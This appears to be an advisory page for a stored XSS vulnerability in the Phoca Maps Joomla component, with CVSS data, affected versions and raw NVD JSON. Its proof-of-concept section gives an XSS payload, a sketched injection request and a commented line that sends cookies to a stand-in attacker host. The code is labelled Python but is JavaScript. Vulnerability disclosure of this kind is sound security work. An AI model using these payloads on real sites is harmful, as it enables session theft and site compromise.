Security Vulnerability Report
中文
CVE-2026-23900 CVSS 6.5 MEDIUM

CVE-2026-23900

Published: 2026-04-11 14:16:03
Last Modified: 2026-04-17 16:15:58

Description

Various stored XSS vulnerabilities in the maps- and icon rendering logic in Phoca Maps component 5.0.0-6.0.2 have been discovered.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phoca:maps:*:*:*:*:*:*:*:* - VULNERABLE
Phoca Maps 5.0.0 - 6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Proof of Concept for CVE-2026-23900 // Target: Phoca Maps Component 5.0.0 - 6.0.2 // Type: Stored XSS in Icon/Map Rendering // 1. Construct the malicious payload to be injected into the Icon field or Map Description var payload = '<img src=x onerror=alert("CVE-2026-23900-Stored-XSS")>'; // 2. Simulate the HTTP Request to inject the payload (Conceptual) // The attacker sends a POST request to the component endpoint saving the map data. /* POST /index.php?option=com_phocamaps&task=map.save HTTP/1.1 Host: vulnerable-joomla-site.com Content-Type: application/x-www-form-urlencoded jform[title]=MyMap&jform[icon]=' + encodeURIComponent(payload) + '&... */ console.log("[+] Payload prepared: " + payload); console.log("[+] Exploit trigger: Payload will execute when an admin views the map in the backend or frontend."); // 3. Malicious action (Cookie Theft example) // var img = new Image(); // img.src = "http://attacker.com/steal.php?c=" + document.cookie;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23900", "sourceIdentifier": "[email protected]", "published": "2026-04-11T14:16:03.377", "lastModified": "2026-04-17T16:15:57.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Various stored XSS vulnerabilities in the maps- and icon rendering logic in Phoca Maps component 5.0.0-6.0.2 have been discovered."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phoca:maps:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndIncluding": "6.0.2", "matchCriteriaId": "E3DDBEAE-CA23-451C-817D-2C85AF9D639C"}]}]}], "references": [{"url": "https://phoca.cz/", "source": "[email protected]", "tags": ["Product"]}]}}